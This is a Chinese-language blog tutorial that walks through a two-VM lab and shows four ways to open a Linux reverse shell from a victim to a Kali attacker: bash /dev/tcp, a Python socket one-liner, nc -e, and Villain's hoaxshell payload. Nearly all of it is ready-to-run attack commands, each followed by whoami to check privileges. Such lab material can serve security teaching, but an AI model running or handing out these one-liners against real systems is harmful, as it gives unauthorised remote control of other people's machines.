当前位置: 首页 > article >正文

2024 同一个网段,反弹shell四种方法【linux版本】bash、python、nc、villian反弹shell图解步骤

实验环境准备(同一个网段下,我是桥接的虚拟机)

一、bash反弹shell

二、python反弹shell

三、nc反弹shell

四、villain反弹shell


实验环境准备(同一个网段下,我是桥接的虚拟机)

      一台kali的linux(攻击者)

        一台centos7/debian[另一个linux](受害者)

一、bash反弹shell

注意:自定义的端口号需要保持一致哦

  1、kali(攻击者)运行命令

nc -lvp 自定义端口号

 

2、debian(受害者)运行命令

 bash -i >& /dev/tcp/攻击者主机的ip/自定义的端口号 0>&1

 

3、结果在kali这边输出,并且已经连接成功,我们可以执行whoami查看权限

whoami

 

二、python反弹shell

注意:自定义的端口号需要保持一致哦

  1、kali(攻击者)运行命令

nc -lvp 自定义端口号

 

2、debian(受害者)运行命令

注意修改攻击者的ip和端口号

python3 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('攻击者的主机ip',自定义的端口号));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

3、结果在kali这边输出,并且已经连接成功,我们可以执行whoami查看权限

whoami

三、nc反弹shell

 注意:自定义的端口号需要保持一致哦

  1、kali(攻击者)运行命令

nc -lvp 自定义端口号

 

2、debian(受害者)运行命令

nc -e /bin/bash 攻击者ip 自定义的端口号

3、结果在kali这边输出,(这个不回显)我们可以直接执行whoami查看权限

whoami

四、villain反弹shell

   1、kali(攻击者)运行命令

 ①运行villain,需要先安装哦

villain

②生成linux的payload命令复制灰色区域的文字到debian的命令行中

温馨提示:可以在villain中使用help generate查看windows的payload生成方法

generate payload=linux/hoaxshell/sh_curl lhost=eth0

2、debian(受害者)复制并运行刚才生成的payload命令

3、结果在kali这边输出

②我们查看上线的主机

sessions

②进入shell,shell session的英文编码id,控制一下debian(受害者)

shell sessionID

③whoami看一下权限 

whoami


http://www.kler.cn/a/398938.html

相关文章:

  • 树的直径计算:算法详解与实现
  • 爬虫——Requests库的使用
  • uniapp隐藏自带的tabBar
  • Py之pymupdf:基于langchain框架结合pymupdf库实现输出每个PDF页面的文本内容、元数据等
  • Win10/11 安装使用 Neo4j Community Edition
  • Excel根据条件动态索引单元格范围
  • 2024 Visual Studio Code的下载与安装
  • NavVis VLX3的精度怎么去进行验证?【上海沪敖3D】
  • 前端框架 详解遍历数组为何需要加Key
  • 简单的爬虫脚本编写
  • 每日计划-1117
  • 拓扑学与DNA双螺旋结构的奇妙连接:从算法到分子模拟
  • 【MySQL-1】MySQL数据库的基本操作
  • 如何在 Spring MVC 中使用 `@PostMapping`? 如何在 Spring MVC 中使用 `@PutMapping`?
  • Linux:版本控制器git和调试工具cgdb
  • react+hook+vite项目使用eletron打包成桌面应用+可以热更新
  • 使用 Python 和 Selenium 解决 hCaptcha:完整指南
  • fastadmin常用操作
  • 推荐一款功能强大的光学识别OCR软件:Readiris Dyslexic
  • YOLO-SLD: An Attention Mechanism-ImprovedYOLO for License Plate Detection
  • 大三学生面试经历(2)
  • K8s学习笔记之了解k8s的网络模型
  • Vue2教程001:初识Vue
  • C 语言Union 结构
  • Docker compose部署RocketMQ(单机版)
  • 解剖了一个Github 5k Star项目